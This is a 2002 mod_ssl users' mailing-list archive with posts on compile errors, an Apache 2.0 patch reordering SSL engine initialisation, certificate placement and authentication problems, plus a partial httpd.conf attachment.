Message-ID: 
Date: Mon, 22 Jul 2002 17:33:43 +0200
To: modssl-users@modssl.org
X-MIMETrack: Serialize by Router on AIGTI2.DOMINO/S/PSA(Release 5.0.8 |June 18, 2001) at
 22/07/2002 05:33:47 PM
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA27998
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: abdel.ramli@mpsa.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


forgot to specify I'm under RedHat 7.2 installing Apache 1.3.26 with Php
4.0.6

mod_ssl-2.8.10-1.3.26 & openssl-0.9.6d


Thanx




                                                                                                                        
                    abdel.ramli@mpsa.co                                                                                 
                    m                         Pour :  modssl-users@modssl.org                                           
                    Envoyé par :              cc :    modssl-users@modssl.org, owner-modssl-users@modssl.org            
                    owner-modssl-users@       Objet : can't compile with modssl                                         
                    modssl.org                                                                                          
                                                                                                                        
                                                                                                                        
                    22/07/2002 17:17                                                                                    
                    Veuillez répondre à                                                                                 
                    modssl-users                                                                                        
                                                                                                                        
                                                                                                                        





Hi all,

I've followed all the instructions to get my Apache compiled with mod_SSL
and I'm keeping getting the following error after making my "modSSL patched
Apache sources.)

Please help if you can, I'ld appreciate very much.

Thanx
The compile looks OK until it suddenly stop giving the following error :


gcc -c  -I../../os/unix -I../../include   -DLINUX=22 -DMOD_SSL=208110
-DUSE_HSRE
GEX -DEAPI -DEAPI `../../apaci` -fpic -DSHARED_MODULE -DSSL_COMPAT
-DSSL_USE_SDB
M -I/soft/sources/PSA_Lamp_1.0.1/openssl-0.9.6d/include -DMOD_SSL_VERSION
=""2.8.
10"" mod_ssl.c && mv mod_ssl.o mod_ssl.lo
mod_ssl.c:76: malformed floating constant
mod_ssl.c:76: parse error before `2.8'
mod_ssl.c:77: malformed floating constant
mod_ssl.c:77: parse error before `2.8'
make[4]: *** [mod_ssl.lo] Error 1
make[3]: *** [all] Error 1
make[2]: *** [subdirs] Error 1
make[2]: Leaving directory `/soft/sources/PSA_Lamp_1.0.1/apache_1.3.26/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/soft/sources/PSA_Lamp_1.0.1/apache_1.3.26'
make: *** [build] Error 2
{op}@bexh35 #



                         \\\___///
                         \\  _ _  //
                       (  @ @  )
+-------------------oOOo-(_)-oOOo--------------------+

Abdel RAMLI
abdel.ramli@mpsa.com
Consultant Altaïr Technologies
PSA Peugeot Citroën | site de Bessoncourt
Unité: DINQ/DSIN/INSI/ETSO/PRD
Tel : 03 84 46 92 79 (229279)
+--------------------------- ---Oooo-------------------+
                       oooO        (  )
                       (  )         )/
                        \(         (_)
                        (_)

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 22 18:57:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA03798; Mon, 22 Jul 2002 18:56:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from georgetown.edu id SAA03784; Mon, 22 Jul 2002 18:55:48 +0200 (MET DST)
Received: from mailhost.georgetown.edu (mailhost.georgetown.edu [141.161.1.103])
	by georgetown.edu (8.12.2/8.12.2) with ESMTP id g6MGtfe8025183
	for ; Mon, 22 Jul 2002 12:55:41 -0400 (EDT)
Received: from georgetown.edu (ott-sun.georgetown.edu [141.161.18.52])
	(user=jwo mech=PLAIN bits=0)
	by mailhost.georgetown.edu (8.12.2/8.12.2) with ESMTP id g6MGtejq009521
	(version=TLSv1/SSLv3 cipher=EXP1024-RC4-SHA bits=56 verify=NOT)
	for ; Mon, 22 Jul 2002 12:55:41 -0400 (EDT)
Message-ID: <3D3C39F2.3DD39291@georgetown.edu>
Date: Mon, 22 Jul 2002 12:59:30 -0400
From: John Ott 
Organization: Georgetown University
X-Mailer: Mozilla 4.7 [en] (X11; I; SunOS 5.8 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Compiling apache with mod_perl + mod_ssl on HP-UX 10.2; link problem
References: <3D37B94F.9E354158@primus.com.au> <20020719073051.GA13345@serv01.aet.tu-cottbus.de> <3D3B9B94.C11ECF29@primus.com.au>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John Ott 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ian Macdonald wrote:

>
> Just in case I come across something that demands the gnu ld, do you
> know why this is hard to find for HP-UX? And does hard==impossible?
>

It is not supported yet for HP-UX 11. x

 I 've yet to find anything the "demands" it,
but I generally use HPs compliers and utilities.

later
John

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 22 20:07:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA08149; Mon, 22 Jul 2002 20:06:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange-ulis.ulis.zencod.com id UAA08132; Mon, 22 Jul 2002 20:05:24 +0200 (MET DST)
Subject: RE: RAND function using OpenSSL 0.9.7 (A Solution)
Date: Mon, 22 Jul 2002 20:05:07 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----_=_NextPart_001_01C231AA.5008B8DF"
Message-ID: 
content-class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
X-MS-TNEF-Correlator: 
Thread-Topic: RAND function using OpenSSL 0.9.7 (A Solution)
Thread-Index: AcIsPcWvdrwmA3CuSA2hwgJLRue4GAFa+N7a
From: "Frederic DONNAT" 
To: 
Cc: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederic DONNAT" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C231AA.5008B8DF
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable

Hi,


I've tested it with Apache-2.0.39 using openssl-0.9.7-beta2, on linux =
Mdk-8.0.
kernel 2.4.3-20mdk
gcc version 2.96
And initializing engine before library enable rand redirection.
That works fine for me.
file: modules/ssl/ssl_engine_init.c

Regards,
Fred


-----Original Message-----
From:	Cliff Woolley [mailto:jwoolley@apache.org]
Sent:	Mon 07/15/2002 10:22 PM
To:	modssl-users@modssl.org
Cc:=09
Subject:	Re: RAND function using OpenSSL 0.9.7 (A Solution)

On Mon, 15 Jul 2002, Geoff Thorpe wrote:

> > I change a function call and it works fine now. I do not know if =
this is
> > the real way to solve my problem but this provide a solution.
> >
> > In file pkg.modssl/ssl_engine_int.c:
> > move "ssl_init_Engine(s, p);" function call before
> > "ssl_init_SSLLibrary();" function call instead of after.
> >
> > In fact if you want to use ENGINE default functionnalities you muste =
set
> > ENGINE before everything.
>
> That is not *a* solution, it is *the* solution. ssl_init_SSLLibrary() =
must
> be seeding the PRNG, and thus initialising the set-on-first-use =
pointer in
> openssl to a default RAND_METHOD. Do you want to post a patch to the =
list?

Well, I can't do anything about 1.3's mod_ssl, but if somebody can =
verify
for me that the following fixes Apache 2.0's mod_ssl, I'll commit it.

--Cliff


Index: ssl_engine_init.c
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
RCS file: /home/cvs/httpd-2.0/modules/ssl/ssl_engine_init.c,v
retrieving revision 1.102
diff -u -d -r1.102 ssl_engine_init.c
--- ssl_engine_init.c   8 Jul 2002 17:43:33 -0000       1.102
+++ ssl_engine_init.c   15 Jul 2002 20:22:13 -0000
@@ -266,6 +266,11 @@

     }

+#ifdef SSL_EXPERIMENTAL_ENGINE
+    /* SSL external crypto device ("engine") support */
+    ssl_init_Engine(base_server, p);
+#endif
+
     ssl_init_SSLLibrary(base_server);

 #if APR_HAS_THREADS
@@ -290,13 +295,6 @@
     if (ssl_tmp_keys_init(base_server)) {
         return !OK;
     }
-
-    /*
-     * SSL external crypto device ("engine") support
-     */
-#ifdef SSL_EXPERIMENTAL_ENGINE
-    ssl_init_Engine(base_server, p);
-#endif

     /*
      * initialize the mutex handling


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org




------_=_NextPart_001_01C231AA.5008B8DF
Content-Type: application/ms-tnef;
	name="winmail.dat"
Content-Transfer-Encoding: base64

eJ8+IgkSAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy
b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEEgAEAMwAAAFJFOiBSQU5EIGZ1bmN0aW9u
IHVzaW5nIE9wZW5TU0wgMC45LjcgKEEgU29sdXRpb24pANEPAQWAAwAOAAAA0gcHABYAFAAFAAcA
AQAXAQEggAMADgAAANIHBwAWABQABQAHAAEAFwEBCYABACEAAABCRjJCNTk5OUNCRjgwNDRDQTc2
MjJBMjlDOTI4MUQ4MAA7BwEDkAYAjA0AADcAAAADACYAAAAAAAMANgAAAAAAQAA5AN+4CFCqMcIB
HgA9AAEAAAAFAAAAUkU6IAAAAAACAUcAAQAAADMAAABjPXVzO2E9IDtwPVpFTkNPRDtsPUVYQ0hB
TkdFLVVMSVMtMDIwNzIyMTgwNTA3Wi01NwAAHgBJAAEAAAAzAAAAUmU6IFJBTkQgZnVuY3Rpb24g
dXNpbmcgT3BlblNTTCAwLjkuNyAoQSBTb2x1dGlvbikAAEAATgAA8jhNPSzCAR4AWgABAAAADgAA
AENsaWZmIFdvb2xsZXkAAAACAVsAAQAAAD8AAAAAAAAAgSsfpL6jEBmdbgDdAQ9UAgAAAABDbGlm
ZiBXb29sbGV5AFNNVFAAandvb2xsZXlAYXBhY2hlLm9yZwAAAgFcAAEAAAAZAAAAU01UUDpKV09P
TExFWUBBUEFDSEUuT1JHAAAAAB4AXQABAAAADgAAAENsaWZmIFdvb2xsZXkAAAACAV4AAQAAAD8A
AAAAAAAAgSsfpL6jEBmdbgDdAQ9UAgAAAABDbGlmZiBXb29sbGV5AFNNVFAAandvb2xsZXlAYXBh
Y2hlLm9yZwAAAgFfAAEAAAAZAAAAU01UUDpKV09PTExFWUBBUEFDSEUuT1JHAAAAAB4AZgABAAAA
BQAAAFNNVFAAAAAAHgBnAAEAAAAUAAAAandvb2xsZXlAYXBhY2hlLm9yZwAeAGgAAQAAAAUAAABT
TVRQAAAAAB4AaQABAAAAFAAAAGp3b29sbGV5QGFwYWNoZS5vcmcAHgBwAAEAAAAvAAAAUkFORCBm
dW5jdGlvbiB1c2luZyBPcGVuU1NMIDAuOS43IChBIFNvbHV0aW9uKQAAAgFxAAEAAAAbAAAAAcIs
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
wsiDyAAo4DLgBcDzzV/JiWFqBbBIQARgyu8F0Fp90YAAHgA1EAEAAABHAAAAPEE5RUUwMTJDMDY4
NUNCNDg5OEE3MEVCNDU5NEE2Q0E3MTJFNkVEQGV4Y2hhbmdlLXVsaXMudWxpcy56ZW5jb2QuY29t
PgAAHgBHEAEAAAAPAAAAbWVzc2FnZS9yZmM4MjIAAAsA8hABAAAAHwDzEAEAAAByAAAAUgBFACUA
MwBBACAAUgBBAE4ARAAgAGYAdQBuAGMAdABpAG8AbgAgAHUAcwBpAG4AZwAgAE8AcABlAG4AUwBT
AEwAIAAwAC4AOQAuADcAIAAoAEEAIABTAG8AbAB1AHQAaQBvAG4AKQAuAEUATQBMAAAAAAALAPYQ
AAAAAEAABzAkuSipqTHCAUAACDDkhxlQqjHCAQMA3j/kBAAAAwDxPwkAAAAeAPg/AQAAABAAAABG
cmVkZXJpYyBET05OQVQAAgH5PwEAAABgAAAAAAAAANynQMjAQhAatLkIACsv4YIBAAAAAAAAAC9P
PVpFTkNPRC9PVT1QUkVNSUVSIEdST1VQRSBBRE1JTklTVFJBVElGL0NOPVJFQ0lQSUVOVFMvQ049
RlJFREVSSUMAHgD6PwEAAAAVAAAAU3lzdGVtIEFkbWluaXN0cmF0b3IAAAAAAgH7PwEAAAAeAAAA
AAAAANynQMjAQhAatLkIACsv4YIBAAAAAAAAAC4AAAADAP0/5AQAAAMAGUAAAAAAAwAaQAAAAAAD
AB1AAAAAAAMAHkAAAAAAHgAwQAEAAAAJAAAARlJFREVSSUMAAAAAHgAxQAEAAAAJAAAARlJFREVS
SUMAAAAAHgAyQAEAAAAUAAAAandvb2xsZXlAYXBhY2hlLm9yZwAeADNAAQAAABQAAABqd29vbGxl
eUBhcGFjaGUub3JnAB4AOEABAAAACQAAAEZSRURFUklDAAAAAB4AOUABAAAAAgAAAC4AAAALACkA
AAAAAAsAIwAAAAAAAwAGEE0PoZcDAAcQ/QYAAAMAEBAAAAAAAwAREAAAAAAeAAgQAQAAAGUAAABI
SSxJVkVURVNURURJVFdJVEhBUEFDSEUtMjAzOVVTSU5HT1BFTlNTTC0wOTctQkVUQTIsT05MSU5V
WE1ESy04MEtFUk5FTDI0My0yME1ES0dDQ1ZFUlNJT04yOTZBTkRJTklUAAAAAAIBfwABAAAARwAA
ADxBOUVFMDEyQzA2ODVDQjQ4OThBNzBFQjQ1OTRBNkNBNzEyRTZFREBleGNoYW5nZS11bGlzLnVs
aXMuemVuY29kLmNvbT4AAGPN

------_=_NextPart_001_01C231AA.5008B8DF--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 23 07:07:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA07430; Tue, 23 Jul 2002 07:06:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id HAA07403; Tue, 23 Jul 2002 07:05:15 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C0FC54CE769; Tue, 23 Jul 2002 07:05:14 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 8BBA2286D2; Tue, 23 Jul 2002 07:02:58 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dario.org id XAA19204; Mon, 22 Jul 2002 23:49:00 +0200 (MET DST)
Received: (from dbahena@localhost)
	by dario.org (8.9.3/8.9.3/Debian 8.9.3-21) id RAA03593;
	Mon, 22 Jul 2002 17:01:57 -0600
Date: Mon, 22 Jul 2002 17:01:57 -0600
Message-Id: <200207222301.RAA03593@dario.org>
From: Dario Bahena Tapia 
To: modssl-users@modssl.org
Subject: mod_ssl security mailing list ...
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dario Bahena Tapia 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi ...

I want to be warned about mod_ssl security issues, I couldn't find
an exact match in the mailing list names ... which one do you
recommend me?

Thanks in advance.

saludos
dario estepario ...
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 23 07:07:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA07437; Tue, 23 Jul 2002 07:06:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id HAA07404; Tue, 23 Jul 2002 07:05:15 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E9ACE4CE76F; Tue, 23 Jul 2002 07:05:14 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id C13A8286D2; Tue, 23 Jul 2002 07:03:14 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dave.w5sv.org id CAA26519; Tue, 23 Jul 2002 02:48:22 +0200 (MET DST)
Received: from w5sv.org (dave.W5SV.org [192.168.131.121])
	by dave.w5sv.org (8.11.6/8.11.6) with ESMTP id g6N0m3e02047;
	Mon, 22 Jul 2002 19:48:03 -0500
Message-ID: <3D3CA7C3.103@w5sv.org>
Date: Mon, 22 Jul 2002 19:48:03 -0500
From: "David F. Reed" 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3
X-Accept-Language: en, ja, es
MIME-Version: 1.0
To: valhalla-list@redhat.com, modssl-users@modssl.org
Subject: RH 7.3 and SSL
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David F. Reed" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Pardon my ignorance and cross posting in hopes of finding the
answer.

I am running RH linux 7.3 (upgraded rom 6.2).

I am trying to get imaps and https working with my certificates;
I think the programs themselves are working, because they present
a funky "localhost@localdomain" certificate.

I seem unable to figure out where to put the certificates I generated
(in /usr/share/ssl/certs).

I did stop and restart the httpd service.

Any clues?


Many thanks.

--Dave

-- 
David F. Reed  -> email: davidf.reed@amd.com (w)  W5SV@arrl.net (h)
(for pgp key: davereed@W5SV.org http://keys.pgp.com/ )
 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 23 15:46:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA04212; Tue, 23 Jul 2002 15:45:50 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from eri.interia.pl id PAA04148; Tue, 23 Jul 2002 15:44:43 +0200 (MET DST)
Received: from poczta.interia.pl (naos.interia.pl [217.74.65.50])
	by eri.interia.pl (Postfix) with ESMTP id 46E05268A7
	for ; Tue, 23 Jul 2002 15:44:42 +0200 (CEST)
Received: from 127.0.0.1 (naos.interia.pl [127.0.0.1])
	by system.wewnetrzny9 (Mailserver) with SMTP id 1BFCD7E4A
	for ; Tue, 23 Jul 2002 15:44:42 +0200 (CEST)
Received: by poczta.interia.pl (Mailserver, from userid 555)
	id 813577CAC; Tue, 23 Jul 2002 15:44:41 +0200 (CEST)
Received: from mozart (anwim-gw.man.polbox.pl [213.241.34.177])
	by poczta.interia.pl (Mailserver) with SMTP id B2D967CA5
	for ; Tue, 23 Jul 2002 15:44:35 +0200 (CEST)
Message-ID: <004801c2324f$1d890780$ef02a8c0@mozart>
From: "Ernest" 
To: 
Subject: problem with ssl
Date: Tue, 23 Jul 2002 15:44:44 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0044_01C2325F.DE2CB8F0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-EMID: c02a422c
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ernest" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0044_01C2325F.DE2CB8F0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_001_0045_01C2325F.DE2E3F90"


------=_NextPart_001_0045_01C2325F.DE2E3F90
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable

Excause me if i wrote to wrong mailing group, but i have a problem with =
logging to documents on server usin ssl.

I have a test server with apache_1.3.19 instaled from rpm under RH7.0
and the secon apache_1.3.26.tar.gz with mod_ssl-2.8.9, =
openssl-0.9.7-beta2, php-4.2.1, mod_perl-1.27 i have installed few weeks =
ago
listening on port 443 only, I changed path in httpd.conf. I send a =
config fila from 1.3.26
My problem is i cant log in using ssl, somethings wrong with =
authentication.

Very thanks for help or tip.

ernest matolicz

------=_NextPart_001_0045_01C2325F.DE2E3F90
Content-Type: text/html;
	charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable









Excause me if i wrote to wrong =
mailing group,=20
but i have a problem with logging to documents on server usin =
ssl.


 


I have a test server with =
apache_1.3.19=20
instaled from rpm under RH7.0


and the secon apache_1.3.26.tar.gz =
with=20
mod_ssl-2.8.9, openssl-0.9.7-beta2, php-4.2.1, mod_perl-1.27 i have =
installed=20
few weeks ago


listening on port 443 only, =
I changed=20
path in httpd.conf. I send a config fila from =
1.3.26


My problem is i cant log in using =
ssl,=20
somethings wrong with authentication.


 


Very thanks for help or =
tip.


 


ernest =
matolicz





    
    

      I noticed that your page: http://www.modssl.or=
g/docs/2.8/ssl_faq.html=20
         
contained a link to: http://www.certisign.com.br/.
On=20
        Thu Mar 14, 2002 at 12:03:09 AM EST the page at http://www.certisign.com.br/=20
        could not be accessed because of the following error: Time =
Out. =20
        

Please note: Unless the broken link points to your =
website,=20
        this is not a problem with your web site.

I work for=20
        InternetSeer, a Web site monitoring company. InternetSeer is =
conducting=20
        an ongoing study of web connectivity. As recommended by the =
Robots=20
        Guidelines, this email is being sent to explain our research =
activities=20
        and to let you know about the difficulty in connecting to your =
site.=20
        

Your page was last examined on Tue Aug 28, 2001 at =
10:56:32 PM=20
        EDT. If your page has not been updated since Tue Aug 28, 2001 at =

        10:56:32 PM EDT, this link is most likely currently =
broken.

The=20
        error listed above was initially detected by our primary site =
monitor in=20
        Philadelphia, Pa. then verified by our secondary site monitor =
located in=20
        Los Angeles, Ca. before this error event was=20
        recorded.

InternetSeer is the largest FREE web site =
monitoring=20
        company in the world. We provide free web site monitoring to =
over 1=20
        million users worldwide. We'll monitor your web site every hour, =
7 days=20
        a week, 24 hours a day for free.

To have InternetSeer =
monitor=20
        your web site for free, click=20
        here for instant signup.

As part of your free web =
site=20
        monitoring, you'll receive immediate notifications when we =
encounter=20
        problems accessing your web site and weekly performance=20
        reports.

InternetSeer does not store or publish the =
content of=20
        your pages, but rather uses availability and link =
information for=20
        our research.
        
Click=20
        here to learn more about =
InternetSeer.

Sincerely,


        
Cindy Jordan
Web Site Analyst
InternetSeer=20

        

        If you prefer not to receive any further alerts =
regarding=20
        regarding the availability of your Web site, click=20
        here to cancel, or reply to this message with the word =
"cancel" in=20
        the subject line.
##modssl-users@modssl.org##
SRC=3D29=20

----------------------------------------------------------------------


Zanim zaczniesz swoj dzien... >>> http://link.interia.pl/f1628


------=_NextPart_001_0045_01C2325F.DE2E3F90--
------=_NextPart_000_0044_01C2325F.DE2CB8F0
Content-Type: application/octet-stream;
	name="httpd.conf"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="httpd.conf"

ServerType standalone
ServerRoot "/usr/src/apache"
#LockFile /usr/src/apache/logs/httpd.lock
PidFile /usr/src/apache/logs/httpd.pid
ScoreBoardFile /usr/src/apache/logs/httpd.scoreboard
#ResourceConfig conf/srm.conf
#AccessConfig conf/access.conf
Timeout 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 15
MinSpareServers 5
MaxSpareServers 10
StartServers 5
MaxClients 150
MaxRequestsPerChild 0
#Listen 3000
#Listen 12.34.56.78:80
#BindAddress *

# Example:
# LoadModule foo_module libexec/mod_foo.so
LoadModule vhost_alias_module libexec/mod_vhost_alias.so
LoadModule env_module         libexec/mod_env.so
LoadModule define_module      libexec/mod_define.so
LoadModule config_log_module  libexec/mod_log_config.so
LoadModule mime_magic_module  libexec/mod_mime_magic.so
LoadModule mime_module        libexec/mod_mime.so
LoadModule negotiation_module libexec/mod_negotiation.so
LoadModule status_module      libexec/mod_status.so
LoadModule info_module        libexec/mod_info.so
LoadModule includes_module    libexec/mod_include.so
LoadModule autoindex_module   libexec/mod_autoindex.so
LoadModule dir_module         libexec/mod_dir.so
LoadModule cgi_module         libexec/mod_cgi.so
LoadModule asis_module        libexec/mod_asis.so
